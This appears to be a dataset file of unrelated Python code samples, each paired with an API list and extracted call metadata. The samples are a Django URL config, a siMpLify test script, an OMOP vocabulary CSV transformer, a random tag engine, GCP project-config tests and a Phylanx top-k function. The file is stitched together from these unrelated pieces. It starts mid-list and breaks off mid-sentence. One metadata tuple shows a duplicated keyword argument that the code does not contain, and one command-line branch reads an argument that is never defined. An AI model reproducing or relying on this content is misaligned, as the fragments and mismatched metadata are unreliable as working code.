url(r'^api/project-by-name/(?P<name>.+)/$', v.ProjectByName.as_view()),
url(r'^api/server-conf/(?P<server_id>\d+)/$', v.ServerConfList.as_view()),
url(
r'^api/server-conf/(?P<server_id>\d+)/(?P<item>.+)/(?P<filename>.+)/$',
v.ServerConfItem.as_view()
),
url(
r'^api/project-conf/(?P<project_id>\d+)/(?P<item>.+)/$',
v.ProjectConfListByItem.as_view()
),
# settings
url(r'^api/local-linux-username/$', v.LocalLinuxUsername.as_view()),
url(r'^api/local-bash-dir/$', v.LocalBashDir.as_view()),
url(r'^api/confirmation-password/$', v.ConfirmationPassword.as_view()),
url(r'^api/server-control-script/$', v.ServerControlScript.as_view()),
url(r'^$', v.home)
]
|
[
"api.views.ProjectListByType.as_view",
"api.views.ConfirmationPassword.as_view",
"django.conf.urls.include",
"api.views.PostfixItem.as_view",
"api.views.ServerConfItem.as_view",
"api.views.LocalLinuxUsername.as_view",
"api.views.LocalBashDir.as_view",
"api.views.ProjectByName.as_view",
"django.conf.urls.url",
"api.views.ServerControlScript.as_view",
"api.views.ProjectConfListByItem.as_view",
"api.views.ServerConfList.as_view",
"rest_framework.routers.DefaultRouter"
] |
[((148, 171), 'rest_framework.routers.DefaultRouter', 'routers.DefaultRouter', ([], {}), '()\n', (169, 171), False, 'from rest_framework import routers\n'), ((1568, 1585), 'django.conf.urls.url', 'url', (['"""^$"""', 'v.home'], {}), "('^$', v.home)\n", (1571, 1585), False, 'from django.conf.urls import include, url\n'), ((634, 658), 'django.conf.urls.include', 'include', (['admin.site.urls'], {}), '(admin.site.urls)\n', (641, 658), False, 'from django.conf.urls import include, url\n'), ((679, 699), 'django.conf.urls.include', 'include', (['router.urls'], {}), '(router.urls)\n', (686, 699), False, 'from django.conf.urls import include, url\n'), ((749, 772), 'api.views.PostfixItem.as_view', 'v.PostfixItem.as_view', ([], {}), '()\n', (770, 772), True, 'from api import views as v\n'), ((820, 849), 'api.views.ProjectListByType.as_view', 'v.ProjectListByType.as_view', ([], {}), '()\n', (847, 849), True, 'from api import views as v\n'), ((900, 925), 'api.views.ProjectByName.as_view', 'v.ProjectByName.as_view', ([], {}), '()\n', (923, 925), True, 'from api import views as v\n'), ((978, 1004), 'api.views.ServerConfList.as_view', 'v.ServerConfList.as_view', ([], {}), '()\n', (1002, 1004), True, 'from api import views as v\n'), ((1104, 1130), 'api.views.ServerConfItem.as_view', 'v.ServerConfItem.as_view', ([], {}), '()\n', (1128, 1130), True, 'from api import views as v\n'), ((1221, 1254), 'api.views.ProjectConfListByItem.as_view', 'v.ProjectConfListByItem.as_view', ([], {}), '()\n', (1252, 1254), True, 'from api import views as v\n'), ((1318, 1348), 'api.views.LocalLinuxUsername.as_view', 'v.LocalLinuxUsername.as_view', ([], {}), '()\n', (1346, 1348), True, 'from api import views as v\n'), ((1385, 1409), 'api.views.LocalBashDir.as_view', 'v.LocalBashDir.as_view', ([], {}), '()\n', (1407, 1409), True, 'from api import views as v\n'), ((1453, 1485), 'api.views.ConfirmationPassword.as_view', 'v.ConfirmationPassword.as_view', ([], {}), '()\n', (1483, 1485), True, 'from api import views as v\n'), ((1529, 1560), 'api.views.ServerControlScript.as_view', 'v.ServerControlScript.as_view', ([], {}), '()\n', (1558, 1560), True, 'from api import views as v\n')]
|
"""
.. module:: tests
    :synopsis: tests of core siMpLify entities
:author: <NAME>
:copyright: 2019-2020
:license: Apache-2.0
"""
import os
import sys
sys.path.insert(0, os.path.join('..', 'simplify'))
sys.path.insert(0, os.path.join('..', '..', 'simplify'))
import simplify.content as content
algorithm, parameters = content.create(
configuration = {'general': {'gpu': True, 'seed': 4}},
package = 'analyst',
    step = 'normalize',
parameters = {'copy': False})
print(algorithm, parameters)
|
[
"simplify.content.create",
"os.path.join"
] |
[((318, 469), 'simplify.content.create', 'content.create', ([], {'configuration': "{'general': {'gpu': True, 'seed': 4}}", 'package': '"""analyst"""', 'step': '"""normalize"""', 'parameters': "{'copy': False}"}), "(configuration={'general': {'gpu': True, 'seed': 4}}, package\n ='analyst', step='scale', step='normalize', parameters={'copy': False})\n", (332, 469), True, 'import simplify.content as content\n'), ((168, 198), 'os.path.join', 'os.path.join', (['""".."""', '"""simplify"""'], {}), "('..', 'simplify')\n", (180, 198), False, 'import os\n'), ((219, 255), 'os.path.join', 'os.path.join', (['""".."""', '""".."""', '"""simplify"""'], {}), "('..', '..', 'simplify')\n", (231, 255), False, 'import os\n')]
|
import csv
import logging
import os
import sys
import warnings
import re
from common import CONCEPT, VOCABULARY, DELIMITER, LINE_TERMINATOR, TRANSFORM_FILES, \
APPEND_VOCABULARY, APPEND_CONCEPTS, ADD_AOU_GENERAL, ERRORS, AOU_GEN_ID, AOU_GEN_VOCABULARY_CONCEPT_ID, \
AOU_GEN_VOCABULARY_REFERENCE, ERROR_APPENDING, AOU_GEN_NAME
from resources import AOU_GENERAL_PATH, AOU_GENERAL_CONCEPT_CSV_PATH, hash_dir
from io import open
RAW_DATE_PATTERN = re.compile(r'\d{8}$')
BQ_DATE_PATTERN = re.compile(r'\d{4}-\d{2}-\d{2}$')
csv.field_size_limit(sys.maxsize)
def format_date_str(date_str):
"""
    Format a date string to yyyy-mm-dd if it is not already
:param date_str: the date string
:return: the formatted date string
:raises: ValueError if a valid date object cannot be parsed from the string
"""
if BQ_DATE_PATTERN.match(date_str):
formatted_date_str = date_str
elif RAW_DATE_PATTERN.match(date_str):
parts = date_str[0:4], date_str[4:6], date_str[6:8]
formatted_date_str = '-'.join(parts)
else:
raise ValueError('Cannot parse value {v} as date'.format(v=date_str))
return formatted_date_str
def _transform_csv(in_fp, out_fp, err_fp=None):
if not err_fp:
err_fp = sys.stderr
csv_reader = csv.reader(in_fp, delimiter=DELIMITER)
header = next(csv_reader)
date_indexes = []
for index, item in enumerate(header):
if item.endswith('_date'):
date_indexes.append(index)
csv_writer = csv.writer(out_fp, delimiter=DELIMITER, lineterminator=LINE_TERMINATOR)
csv_writer.writerow(header)
for row in csv_reader:
try:
for i in date_indexes:
row[i] = format_date_str(row[i])
csv_writer.writerow(row)
except (ValueError, IndexError) as e:
            message = 'Error %s transforming row:\n%s' % (e, row)
err_fp.write(message)
def transform_file(file_path, out_dir):
"""
    Format date fields and standardize line endings of a local csv file and save the result in the specified directory
:param file_path: Path to the csv file
:param out_dir: Directory to save the transformed file
"""
file_name = os.path.basename(file_path)
out_file_name = os.path.join(out_dir, file_name)
err_dir = os.path.join(out_dir, ERRORS)
err_file_name = os.path.join(err_dir, file_name)
try:
os.makedirs(err_dir)
except OSError:
logging.info("Error directory:\t%s\t already exists", err_dir)
with open(file_path, 'r') as in_fp, open(out_file_name, 'w') as out_fp, open(err_file_name, 'w') as err_fp:
_transform_csv(in_fp, out_fp, err_fp)
def transform_files(in_dir, out_dir):
"""
Transform vocabulary files in a directory and save result in another directory
:param in_dir: Directory containing vocabulary csv files
:param out_dir: Directory to save the transformed file
"""
fs = os.listdir(in_dir)
for f in fs:
in_path = os.path.join(in_dir, f)
transform_file(in_path, out_dir)
def get_aou_general_version():
return hash_dir(AOU_GENERAL_PATH)
def get_aou_general_vocabulary_row():
aou_gen_version = get_aou_general_version()
# vocabulary_id vocabulary_name vocabulary_reference vocabulary_version vocabulary_concept_id
return DELIMITER.join([AOU_GEN_ID, AOU_GEN_NAME, AOU_GEN_VOCABULARY_REFERENCE, aou_gen_version,
AOU_GEN_VOCABULARY_CONCEPT_ID])
def append_concepts(in_path, out_path):
with open(out_path, 'w') as out_fp:
# copy original rows line by line for memory efficiency
with open(in_path, 'r') as in_fp:
for row in in_fp:
if AOU_GEN_ID in row:
# skip it so it is appended below
warnings.warn(ERROR_APPENDING.format(in_path=in_path))
else:
out_fp.write(row)
# append new rows
with open(AOU_GENERAL_CONCEPT_CSV_PATH, 'r') as aou_gen_fp:
# Sending the first five lines of the file because tab delimiters
# are causing trouble with the Sniffer and has_header method
five_lines = ''
for _ in range(0, 5):
five_lines += aou_gen_fp.readline()
has_header = csv.Sniffer().has_header(five_lines)
aou_gen_fp.seek(0)
# skip header if present
if has_header:
next(aou_gen_fp)
for row in aou_gen_fp:
out_fp.write(row)
def append_vocabulary(in_path, out_path):
new_row = get_aou_general_vocabulary_row()
with open(out_path, 'w') as out_fp:
# copy original rows line by line for memory efficiency
with open(in_path, 'r') as in_fp:
for row in in_fp:
if AOU_GEN_ID in row:
# skip it so it is appended below
warnings.warn(ERROR_APPENDING.format(in_path=in_path))
else:
out_fp.write(row)
# append new row
out_fp.write(new_row)
def add_aou_general(in_dir, out_dir):
file_names = os.listdir(in_dir)
concept_in_path = None
vocabulary_in_path = None
# Case-insensitive search for concept and vocabulary files
for file_name in file_names:
table_name, _ = os.path.splitext(file_name.lower())
in_path = os.path.join(in_dir, file_name)
if table_name == CONCEPT:
concept_in_path = in_path
elif table_name == VOCABULARY:
vocabulary_in_path = in_path
if concept_in_path is None:
raise IOError('CONCEPT.csv was not found in %s' % in_dir)
if vocabulary_in_path is None:
raise IOError('VOCABULARY.csv was not found in %s' % in_dir)
concept_out_path = os.path.join(out_dir, os.path.basename(concept_in_path))
append_concepts(concept_in_path, concept_out_path)
vocabulary_out_path = os.path.join(out_dir, os.path.basename(vocabulary_in_path))
append_vocabulary(vocabulary_in_path, vocabulary_out_path)
if __name__ == '__main__':
import argparse
arg_parser = argparse.ArgumentParser(formatter_class=argparse.RawDescriptionHelpFormatter)
arg_parser.add_argument('command', choices=[TRANSFORM_FILES, ADD_AOU_GENERAL, APPEND_VOCABULARY, APPEND_CONCEPTS])
arg_parser.add_argument('--in_dir', required=True)
arg_parser.add_argument('--out_dir', required=True)
args = arg_parser.parse_args()
if args.command == TRANSFORM_FILES:
transform_files(args.in_dir, args.out_dir)
elif args.command == ADD_AOU_GENERAL:
add_aou_general(args.in_dir, args.out_dir)
elif args.command == APPEND_VOCABULARY:
append_vocabulary(args.file, args.out_dir)
elif args.command == APPEND_CONCEPTS:
append_concepts(args.file, args.out_dir)
|
[
"common.ERROR_APPENDING.format",
"resources.hash_dir",
"csv.reader",
"csv.writer",
"argparse.ArgumentParser",
"os.path.basename",
"os.makedirs",
"common.DELIMITER.join",
"csv.field_size_limit",
"csv.Sniffer",
"logging.info",
"io.open",
"os.path.join",
"os.listdir",
"re.compile"
] |
[((454, 475), 're.compile', 're.compile', (['"""\\\\d{8}$"""'], {}), "('\\\\d{8}$')\n", (464, 475), False, 'import re\n'), ((494, 529), 're.compile', 're.compile', (['"""\\\\d{4}-\\\\d{2}-\\\\d{2}$"""'], {}), "('\\\\d{4}-\\\\d{2}-\\\\d{2}$')\n", (504, 529), False, 'import re\n'), ((529, 562), 'csv.field_size_limit', 'csv.field_size_limit', (['sys.maxsize'], {}), '(sys.maxsize)\n', (549, 562), False, 'import csv\n'), ((1285, 1323), 'csv.reader', 'csv.reader', (['in_fp'], {'delimiter': 'DELIMITER'}), '(in_fp, delimiter=DELIMITER)\n', (1295, 1323), False, 'import csv\n'), ((1509, 1580), 'csv.writer', 'csv.writer', (['out_fp'], {'delimiter': 'DELIMITER', 'lineterminator': 'LINE_TERMINATOR'}), '(out_fp, delimiter=DELIMITER, lineterminator=LINE_TERMINATOR)\n', (1519, 1580), False, 'import csv\n'), ((2218, 2245), 'os.path.basename', 'os.path.basename', (['file_path'], {}), '(file_path)\n', (2234, 2245), False, 'import os\n'), ((2266, 2298), 'os.path.join', 'os.path.join', (['out_dir', 'file_name'], {}), '(out_dir, file_name)\n', (2278, 2298), False, 'import os\n'), ((2313, 2342), 'os.path.join', 'os.path.join', (['out_dir', 'ERRORS'], {}), '(out_dir, ERRORS)\n', (2325, 2342), False, 'import os\n'), ((2363, 2395), 'os.path.join', 'os.path.join', (['err_dir', 'file_name'], {}), '(err_dir, file_name)\n', (2375, 2395), False, 'import os\n'), ((2954, 2972), 'os.listdir', 'os.listdir', (['in_dir'], {}), '(in_dir)\n', (2964, 2972), False, 'import os\n'), ((3117, 3143), 'resources.hash_dir', 'hash_dir', (['AOU_GENERAL_PATH'], {}), '(AOU_GENERAL_PATH)\n', (3125, 3143), False, 'from resources import AOU_GENERAL_PATH, AOU_GENERAL_CONCEPT_CSV_PATH, hash_dir\n'), ((3341, 3465), 'common.DELIMITER.join', 'DELIMITER.join', (['[AOU_GEN_ID, AOU_GEN_NAME, AOU_GEN_VOCABULARY_REFERENCE, aou_gen_version,\n AOU_GEN_VOCABULARY_CONCEPT_ID]'], {}), '([AOU_GEN_ID, AOU_GEN_NAME, AOU_GEN_VOCABULARY_REFERENCE,\n aou_gen_version, AOU_GEN_VOCABULARY_CONCEPT_ID])\n', (3355, 3465), False, 'from common import CONCEPT, VOCABULARY, DELIMITER, LINE_TERMINATOR, TRANSFORM_FILES, APPEND_VOCABULARY, APPEND_CONCEPTS, ADD_AOU_GENERAL, ERRORS, AOU_GEN_ID, AOU_GEN_VOCABULARY_CONCEPT_ID, AOU_GEN_VOCABULARY_REFERENCE, ERROR_APPENDING, AOU_GEN_NAME\n'), ((5160, 5178), 'os.listdir', 'os.listdir', (['in_dir'], {}), '(in_dir)\n', (5170, 5178), False, 'import os\n'), ((6149, 6226), 'argparse.ArgumentParser', 'argparse.ArgumentParser', ([], {'formatter_class': 'argparse.RawDescriptionHelpFormatter'}), '(formatter_class=argparse.RawDescriptionHelpFormatter)\n', (6172, 6226), False, 'import argparse\n'), ((2414, 2434), 'os.makedirs', 'os.makedirs', (['err_dir'], {}), '(err_dir)\n', (2425, 2434), False, 'import os\n'), ((2536, 2556), 'io.open', 'open', (['file_path', '"""r"""'], {}), "(file_path, 'r')\n", (2540, 2556), False, 'from io import open\n'), ((2567, 2591), 'io.open', 'open', (['out_file_name', '"""w"""'], {}), "(out_file_name, 'w')\n", (2571, 2591), False, 'from io import open\n'), ((2603, 2627), 'io.open', 'open', (['err_file_name', '"""w"""'], {}), "(err_file_name, 'w')\n", (2607, 2627), False, 'from io import open\n'), ((3008, 3031), 'os.path.join', 'os.path.join', (['in_dir', 'f'], {}), '(in_dir, f)\n', (3020, 3031), False, 'import os\n'), ((3540, 3559), 'io.open', 'open', (['out_path', '"""w"""'], {}), "(out_path, 'w')\n", (3544, 3559), False, 'from io import open\n'), ((4654, 4673), 'io.open', 'open', (['out_path', '"""w"""'], {}), "(out_path, 'w')\n", (4658, 4673), False, 'from io import open\n'), ((5410, 5441), 'os.path.join', 'os.path.join', (['in_dir', 'file_name'], {}), '(in_dir, file_name)\n', (5422, 5441), False, 'import os\n'), ((5842, 5875), 'os.path.basename', 'os.path.basename', (['concept_in_path'], {}), '(concept_in_path)\n', (5858, 5875), False, 'import os\n'), ((5981, 6017), 'os.path.basename', 'os.path.basename', (['vocabulary_in_path'], {}), '(vocabulary_in_path)\n', (5997, 6017), False, 'import os\n'), ((2463, 2525), 'logging.info', 'logging.info', (['"""Error directory:\t%s\t already exists"""', 'err_dir'], {}), "('Error directory:\\t%s\\t already exists', err_dir)\n", (2475, 2525), False, 'import logging\n'), ((3648, 3666), 'io.open', 'open', (['in_path', '"""r"""'], {}), "(in_path, 'r')\n", (3652, 3666), False, 'from io import open\n'), ((3974, 4013), 'io.open', 'open', (['AOU_GENERAL_CONCEPT_CSV_PATH', '"""r"""'], {}), "(AOU_GENERAL_CONCEPT_CSV_PATH, 'r')\n", (3978, 4013), False, 'from io import open\n'), ((4762, 4780), 'io.open', 'open', (['in_path', '"""r"""'], {}), "(in_path, 'r')\n", (4766, 4780), False, 'from io import open\n'), ((4320, 4333), 'csv.Sniffer', 'csv.Sniffer', ([], {}), '()\n', (4331, 4333), False, 'import csv\n'), ((3833, 3872), 'common.ERROR_APPENDING.format', 'ERROR_APPENDING.format', ([], {'in_path': 'in_path'}), '(in_path=in_path)\n', (3855, 3872), False, 'from common import CONCEPT, VOCABULARY, DELIMITER, LINE_TERMINATOR, TRANSFORM_FILES, APPEND_VOCABULARY, APPEND_CONCEPTS, ADD_AOU_GENERAL, ERRORS, AOU_GEN_ID, AOU_GEN_VOCABULARY_CONCEPT_ID, AOU_GEN_VOCABULARY_REFERENCE, ERROR_APPENDING, AOU_GEN_NAME\n'), ((4947, 4986), 'common.ERROR_APPENDING.format', 'ERROR_APPENDING.format', ([], {'in_path': 'in_path'}), '(in_path=in_path)\n', (4969, 4986), False, 'from common import CONCEPT, VOCABULARY, DELIMITER, LINE_TERMINATOR, TRANSFORM_FILES, APPEND_VOCABULARY, APPEND_CONCEPTS, ADD_AOU_GENERAL, ERRORS, AOU_GEN_ID, AOU_GEN_VOCABULARY_CONCEPT_ID, AOU_GEN_VOCABULARY_REFERENCE, ERROR_APPENDING, AOU_GEN_NAME\n')]
|
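A quick usage sketch for format_date_str from the sample above; the three cases mirror its docstring and the two regex patterns. It assumes the function is in scope (e.g. the module has been imported).
print(format_date_str('2020-01-31'))  # already yyyy-mm-dd, returned unchanged
print(format_date_str('20200131'))    # raw yyyymmdd, reformatted to 2020-01-31
try:
    format_date_str('Jan 31, 2020')   # anything else raises ValueError
except ValueError as e:
    print(e)                          # Cannot parse value Jan 31, 2020 as date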
from abc import ABC
import abc
from CouncilTag.ingest.models import Tag
import random
class TagEngine(ABC):
'''
    TagEngine is an interface class. You must create a new
    class that takes TagEngine as its base and implement the
    "find_tags" and "apply_tags" methods to use in the meeting ingestion process
'''
@abc.abstractmethod
def find_tags(self, agenda_item):
'''
This method expects one parameter, an AgendaItem model.
It should return a list of appropriate tags
'''
raise NotImplementedError("find_tags needs to be implemented")
@abc.abstractmethod
def apply_tags(self, agenda_item, tags):
'''
This method expects two parameters, an AgendaItem model and
a list of tags to be applied to the AgendaItem model
'''
raise NotImplementedError("apply_tags needs to be implemented")
class RandomTagEngine(TagEngine):
tags = []
def __init__(self):
self.tags = Tag.objects.all()
def find_tags(self, agenda_item):
'''
find_tags takes an Agenda Item and outputs
a list of Tag objects
'''
n1 = 0
n2 = 0
while n1 == n2:
n1 = random.randrange(0, len(self.tags))
n2 = random.randrange(0, len(self.tags))
return [ self.tags[n1], self.tags[n2] ]
def apply_tags(self, agenda_item, tags):
'''
apply_tags takes an Agenda Item and a list of Tag objects. The side
effect of this function will be saving the tag association with the
Agenda Item
'''
for t in tags:
agenda_item.tags.add(t)
agenda_item.save()
|
[
"CouncilTag.ingest.models.Tag.objects.all"
] |
[((990, 1007), 'CouncilTag.ingest.models.Tag.objects.all', 'Tag.objects.all', ([], {}), '()\n', (1005, 1007), False, 'from CouncilTag.ingest.models import Tag\n')]
|
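A minimal wiring sketch for the interface above. The AgendaItem import and lookup are hypothetical stand-ins (the model itself is not shown in the sample); the engine calls mirror the docstrings.
from CouncilTag.ingest.models import AgendaItem  # assumed model, not shown above

engine = RandomTagEngine()         # loads all Tag rows in __init__
item = AgendaItem.objects.first()  # hypothetical: pick any agenda item
tags = engine.find_tags(item)       # two distinct randomly chosen tags
engine.apply_tags(item, tags)       # associates them and saves the item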
"""Tests for rule_generator.project_config."""
from __future__ import absolute_import
from __future__ import division
from __future__ import print_function
import copy
from absl.testing import absltest
import yaml
from deploy.rule_generator.project_config import ProjectConfig
TEST_PROJECT_YAML = """
overall:
organization_id: '246801357924'
billing_account: <KEY>
forseti:
project:
project_id: forseti-project
owners_group: <EMAIL>
auditors_group: <EMAIL>
data_readwrite_groups:
- <EMAIL>
data_readonly_groups:
- <EMAIL>
generated_fields:
project_number: 9999,
log_sink_service_account: <EMAIL>
generated_fields:
service_account: <EMAIL>
server_bucket: gs://forseti-project-server/
projects:
- project_id: sample-data
owners_group: <EMAIL>
auditors_group: <EMAIL>
data_readwrite_groups:
- <EMAIL>
data_readonly_groups:
- <EMAIL>
- <EMAIL>
additional_project_permissions:
- roles:
- roles/bigquery.dataViewer
- roles/ml.developer
members:
- group:<EMAIL>
- group:<EMAIL>
- group:<EMAIL>
audit_logs:
logs_gcs_bucket:
location: US
storage_class: MULTI_REGIONAL
ttl_days: 365
logs_bigquery_dataset:
location: US
data_buckets:
- name_suffix: '-raw'
location: US-CENTRAL1
storage_class: REGIONAL
- name_suffix: '-processed'
location: US-CENTRAL1
storage_class: REGIONAL
additional_bucket_permissions:
owners:
- 'serviceAccount:<EMAIL>'
bigquery_datasets:
- name: 'data'
location: US
- name: 'more_data'
location: US
additional_dataset_permissions:
readwrite:
- 'serviceAccount:<EMAIL>'
- name: 'euro_data'
location: EU
stackdriver_alert_email: <EMAIL>
enabled_apis:
- monitoring.googleapis.com
- logging.googleapis.com
generated_fields:
project_number: 123546879123
log_sink_service_account: <EMAIL>
"""
class ProjectConfigTest(absltest.TestCase):
def test_load_valid_config(self):
yaml_dict = yaml.load(TEST_PROJECT_YAML)
project = ProjectConfig(
project=yaml_dict['projects'][0],
audit_logs_project=None,
forseti=yaml_dict['forseti'])
self.assertIsNotNone(project)
self.assertEqual('sample-data', project.project_id)
self.assertEqual(['monitoring.googleapis.com', 'logging.googleapis.com'],
project.enabled_apis)
expected_proj_bindings = {
'roles/owner': ['group:<EMAIL>'],
'roles/editor': [
'serviceAccount:<EMAIL>',
'serviceAccount:<EMAIL>',
('serviceAccount:service-123546879123@'
'containerregistry.iam.gserviceaccount.com'),
],
'roles/iam.securityReviewer': [
'group:sample-data-<EMAIL>',
'serviceAccount:<EMAIL>',
],
'roles/bigquery.dataViewer': [
'group:<EMAIL>',
'group:<EMAIL>',
'group:<EMAIL>',
],
'roles/ml.developer': [
'group:<EMAIL>',
'group:<EMAIL>',
'group:<EMAIL>',
],
}
self.assertDictEqual(expected_proj_bindings, project.get_project_bindings())
expected_log_bindings = {
'roles/storage.admin': ['group:<EMAIL>'],
'roles/storage.objectAdmin': [],
'roles/storage.objectViewer': ['group:<EMAIL>'],
'roles/storage.objectCreator': [
'group:<EMAIL>'
],
}
expected_raw_data_bindings = {
'roles/storage.admin': ['group:<EMAIL>',],
'roles/storage.objectAdmin': [
'group:<EMAIL>',
],
'roles/storage.objectCreator': [],
'roles/storage.objectViewer': [
'group:<EMAIL>',
'group:<EMAIL>',
],
}
expected_processed_data_bindings = copy.deepcopy(expected_raw_data_bindings)
expected_processed_data_bindings['roles/storage.admin'].append(
'serviceAccount:<EMAIL>')
expected_bucket_bindings = [
(['sample-data-logs'], expected_log_bindings),
(['sample-data-processed'], expected_processed_data_bindings),
(['sample-data-raw'], expected_raw_data_bindings),
]
self.assertEqual(expected_bucket_bindings, project.get_bucket_bindings())
self.assertEqual(
'bigquery.googleapis.com/projects/sample-data/datasets/audit_logs',
project.get_audit_log_sink_destination())
def test_get_project_bigquery_bindings(self):
yaml_dict = yaml.load(TEST_PROJECT_YAML)
project = ProjectConfig(
project=yaml_dict['projects'][0],
audit_logs_project=None,
forseti=yaml_dict['forseti'])
got_bindings = project.get_project_bigquery_bindings()
default_bindings = [
{
'role': 'OWNER',
'members': [{'group_email': '<EMAIL>'}],
},
{
'role': 'WRITER',
'members': [{'group_email': '<EMAIL>'}],
},
{
'role': 'READER',
'members': [
{'group_email': '<EMAIL>'},
{'group_email': '<EMAIL>'},
],
},
]
# Dataset more_data has an additional writer account.
custom_bindings = copy.deepcopy(default_bindings)
custom_bindings[1]['members'].append(
{'user_email': '<EMAIL>'})
want_bindings = [
(['sample-data:data', 'sample-data:euro_data'], default_bindings),
(['sample-data:more_data'], custom_bindings)
]
self.assertEqual(got_bindings, want_bindings)
def test_get_audit_logs_bigquery_bindings_local(self):
yaml_dict = yaml.load(TEST_PROJECT_YAML)
project = ProjectConfig(
project=yaml_dict['projects'][0],
audit_logs_project=None,
forseti=yaml_dict['forseti'])
got_bindings = project.get_audit_logs_bigquery_bindings()
want_bindings = [
{
'role': 'OWNER',
'members': [{'group_email': '<EMAIL>'}],
},
{
'role': 'WRITER',
'members': [{
'user_email':
'<EMAIL>'
}],
},
{
'role': 'READER',
'members': [{'group_email': '<EMAIL>'}],
},
]
self.assertEqual(got_bindings, want_bindings)
def test_get_audit_logs_bigquery_bindings_remote(self):
yaml_dict = yaml.load(TEST_PROJECT_YAML)
project_dict = yaml_dict['projects'][0]
# Set remote audit logs instead of local audit logs.
project_dict['audit_logs'] = {
'logs_bigquery_dataset': {
'name': 'some_data_logs'
},
}
audit_logs_project = {
'project_id': 'audit-logs',
'owners_group': '<EMAIL>',
}
forseti = yaml_dict['forseti']
project = ProjectConfig(
project=project_dict,
audit_logs_project=audit_logs_project,
forseti=forseti)
got_bindings = project.get_audit_logs_bigquery_bindings()
want_bindings = [
{
'role': 'OWNER',
'members': [{'group_email': '<EMAIL>'}],
},
{
'role': 'WRITER',
'members': [{
'user_email':
'<EMAIL>'
}],
},
{
'role': 'READER',
'members': [{'group_email': '<EMAIL>'}],
},
]
self.assertEqual(got_bindings, want_bindings)
def test_get_audit_log_sink_destination(self):
# Local audit logs.
yaml_dict = yaml.load(TEST_PROJECT_YAML)
project_dict = yaml_dict['projects'][0]
forseti = yaml_dict['forseti']
project = ProjectConfig(
project=project_dict, audit_logs_project=None, forseti=forseti)
self.assertEqual(
'bigquery.googleapis.com/projects/sample-data/datasets/audit_logs',
project.get_audit_log_sink_destination())
# Remote audit logs.
project_dict['audit_logs'] = {
'logs_bigquery_dataset': {
'name': 'some_data_logs'
},
}
audit_logs_project = {
'project_id': 'audit-logs',
'owners_group': '<EMAIL>',
}
project = ProjectConfig(
project=project_dict,
audit_logs_project=audit_logs_project,
forseti=forseti)
self.assertEqual(
'bigquery.googleapis.com/projects/audit-logs/datasets/some_data_logs',
project.get_audit_log_sink_destination())
if __name__ == '__main__':
absltest.main()
|
[
"deploy.rule_generator.project_config.ProjectConfig",
"absl.testing.absltest.main",
"yaml.load",
"copy.deepcopy"
] |
[((8398, 8413), 'absl.testing.absltest.main', 'absltest.main', ([], {}), '()\n', (8411, 8413), False, 'from absl.testing import absltest\n'), ((2040, 2068), 'yaml.load', 'yaml.load', (['TEST_PROJECT_YAML'], {}), '(TEST_PROJECT_YAML)\n', (2049, 2068), False, 'import yaml\n'), ((2083, 2189), 'deploy.rule_generator.project_config.ProjectConfig', 'ProjectConfig', ([], {'project': "yaml_dict['projects'][0]", 'audit_logs_project': 'None', 'forseti': "yaml_dict['forseti']"}), "(project=yaml_dict['projects'][0], audit_logs_project=None,\n forseti=yaml_dict['forseti'])\n", (2096, 2189), False, 'from deploy.rule_generator.project_config import ProjectConfig\n'), ((3832, 3873), 'copy.deepcopy', 'copy.deepcopy', (['expected_raw_data_bindings'], {}), '(expected_raw_data_bindings)\n', (3845, 3873), False, 'import copy\n'), ((4492, 4520), 'yaml.load', 'yaml.load', (['TEST_PROJECT_YAML'], {}), '(TEST_PROJECT_YAML)\n', (4501, 4520), False, 'import yaml\n'), ((4535, 4641), 'deploy.rule_generator.project_config.ProjectConfig', 'ProjectConfig', ([], {'project': "yaml_dict['projects'][0]", 'audit_logs_project': 'None', 'forseti': "yaml_dict['forseti']"}), "(project=yaml_dict['projects'][0], audit_logs_project=None,\n forseti=yaml_dict['forseti'])\n", (4548, 4641), False, 'from deploy.rule_generator.project_config import ProjectConfig\n'), ((5220, 5251), 'copy.deepcopy', 'copy.deepcopy', (['default_bindings'], {}), '(default_bindings)\n', (5233, 5251), False, 'import copy\n'), ((5610, 5638), 'yaml.load', 'yaml.load', (['TEST_PROJECT_YAML'], {}), '(TEST_PROJECT_YAML)\n', (5619, 5638), False, 'import yaml\n'), ((5653, 5759), 'deploy.rule_generator.project_config.ProjectConfig', 'ProjectConfig', ([], {'project': "yaml_dict['projects'][0]", 'audit_logs_project': 'None', 'forseti': "yaml_dict['forseti']"}), "(project=yaml_dict['projects'][0], audit_logs_project=None,\n forseti=yaml_dict['forseti'])\n", (5666, 5759), False, 'from deploy.rule_generator.project_config import ProjectConfig\n'), ((6358, 6386), 'yaml.load', 'yaml.load', (['TEST_PROJECT_YAML'], {}), '(TEST_PROJECT_YAML)\n', (6367, 6386), False, 'import yaml\n'), ((6765, 6860), 'deploy.rule_generator.project_config.ProjectConfig', 'ProjectConfig', ([], {'project': 'project_dict', 'audit_logs_project': 'audit_logs_project', 'forseti': 'forseti'}), '(project=project_dict, audit_logs_project=audit_logs_project,\n forseti=forseti)\n', (6778, 6860), False, 'from deploy.rule_generator.project_config import ProjectConfig\n'), ((7474, 7502), 'yaml.load', 'yaml.load', (['TEST_PROJECT_YAML'], {}), '(TEST_PROJECT_YAML)\n', (7483, 7502), False, 'import yaml\n'), ((7596, 7673), 'deploy.rule_generator.project_config.ProjectConfig', 'ProjectConfig', ([], {'project': 'project_dict', 'audit_logs_project': 'None', 'forseti': 'forseti'}), '(project=project_dict, audit_logs_project=None, forseti=forseti)\n', (7609, 7673), False, 'from deploy.rule_generator.project_config import ProjectConfig\n'), ((8099, 8194), 'deploy.rule_generator.project_config.ProjectConfig', 'ProjectConfig', ([], {'project': 'project_dict', 'audit_logs_project': 'audit_logs_project', 'forseti': 'forseti'}), '(project=project_dict, audit_logs_project=audit_logs_project,\n forseti=forseti)\n', (8112, 8194), False, 'from deploy.rule_generator.project_config import ProjectConfig\n')]
|
# Copyright (c) 2019 <NAME>
#
# Distributed under the Boost Software License, Version 1.0. (See accompanying
# file LICENSE_1_0.txt or copy at http://www.boost.org/LICENSE_1_0.txt)
import numpy as np
from phylanx import Phylanx
@Phylanx
def in_top_k(predictions, targets, k):
top_k = np.argsort(-predictions)[:, :k]
target = reshape(targets, [-1, 1]) # noqa
return np.any(target == top_k, -1)
|
[
"numpy.any",
"numpy.argsort"
] |
[((384, 411), 'numpy.any', 'np.any', (['(target == top_k)', '(-1)'], {}), '(target == top_k, -1)\n', (390, 411), True, 'import numpy as np\n'), ((294, 318), 'numpy.argsort', 'np.argsort', (['(-predictions)'], {}), '(-predictions)\n', (304, 318), True, 'import numpy as np\n')]
|
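To make the semantics of in_top_k above concrete, here is the same computation in plain NumPy with made-up values; targets.reshape stands in for the Phylanx reshape builtin.
import numpy as np

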